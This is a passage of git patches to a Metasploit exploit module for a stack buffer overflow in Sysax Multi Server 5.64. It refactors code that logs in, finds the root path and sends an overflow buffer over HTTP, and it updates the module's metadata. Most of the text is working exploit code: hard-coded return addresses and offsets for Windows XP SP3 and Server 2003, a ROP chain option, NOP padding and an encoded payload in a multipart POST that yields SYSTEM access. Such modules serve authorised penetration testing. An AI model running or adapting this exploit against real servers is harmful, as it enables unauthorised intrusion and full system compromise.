root_path = r.body.match(/^invalid path: (.*)\\#{random_folder_name}\.$/)[1] + print_status "Root Dir: #{root_path}" - buffer = rand_text(target['Offset']-root_path.length) - buffer << [target.ret].pack('V') + root_path - if (target['Rop']) - buffer << [target['Nop']].pack('V')*16 - buffer << create_rop_chain() - end + end - buffer << make_nops(15) - buffer << payload.encoded + def exploit - post_data = Rex::MIME::Message.new - post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"") - post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669" + connect - r = send_request_cgi({ - 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=mk_folder2_name1.htm", - 'method' => 'POST', - 'data' => post_data.to_s, - 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", - }) + sid = get_sid + root_path = get_root_path(sid) - disconnect + buffer = rand_text(target['Offset']-root_path.length) + buffer << [target.ret].pack('V') - end + if (target['Rop']) + buffer << [target['Nop']].pack('V')*16 + buffer << create_rop_chain() + end + + buffer << make_nops(15) + buffer << payload.encoded + + post_data = Rex::MIME::Message.new + post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"") + post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669" + + r = send_request_cgi({ + 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=mk_folder2_name1.htm", + 'method' => 'POST', + 'data' => post_data.to_s, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + }) + + disconnect + + end end - From 3da8a59cf025d2b3d091be9911aa6c2821477128 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 20 Aug 2012 22:42:54 +0200 Subject: [PATCH 5/5] a little cleanup plus complete metadata --- .../windows/http/sysax_create_folder.rb | 27 +++++++++---------- 1 file changed, 12 insertions(+), 15 deletions(-) diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index a07189e478..9ad9bbdbae 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -20,14 +16,14 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Sysax Multi Server 5.64 Create Folder Buffer Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in the create folder function - in Sysax Multi Server 5.64. This issue was fixed in 5.66. + This module exploits a stack buffer overflow in the create folder function in + Sysax Multi Server 5.64. This issue was fixed in 5.66. In order to trigger the + vulnerability valid credentials with the create folder permission must be provided. + The HTTP option must be enabled on Sysax too. - You must have valid credentials to trigger the vulnerability. Your credentials - must also have the create folder permission and the HTTP option has to be enabled. - This module will log into the server, get your a SID token, find the root folder, - and then proceed to exploit the server. Successful exploits result in LOCALSYSTEM - access. This exploit works on XP SP3, and Server 2003 SP1-SP2. + This module will log into the server, get a SID token, find the root folder, and + then proceed to exploit the server. Successful exploits result in SYSTEM access. + This exploit works on XP SP3, and Server 2003 SP1-SP2. }, 'License' => MSF_LICENSE, 'Author' => @@ -36,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'References' => [ + [ 'EDB', '20676' ], [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], ], 'DefaultOptions' => @@ -52,14 +49,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ - [ 'Windows XP SP3', + [ 'Windows XP SP3 / Sysax Multi Server 5.64', { 'Rop' => false, 'Ret' => 0x77c35459, # push esp # ret [msvcrt.dll] 'Offset' => 711, } ], - [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', + [ 'Windows 2003 SP1-SP2 / Sysax Multi Server 5.64', { 'Rop' => true, 'Ret' => 0x77baf605, # pop esi; pop ebp; retn 0c; [msvcrt.dll] (pivot) @@ -68,8 +65,8 @@ class Metasploit3 < Msf::Exploit::Remote } ], ], - 'Privileged' => false, - 'DisclosureDate'=> 'July 29, 2012', + 'Privileged' => true, + 'DisclosureDate'=> 'Jul 29 2012', 'DefaultTarget' => 0)) register_options(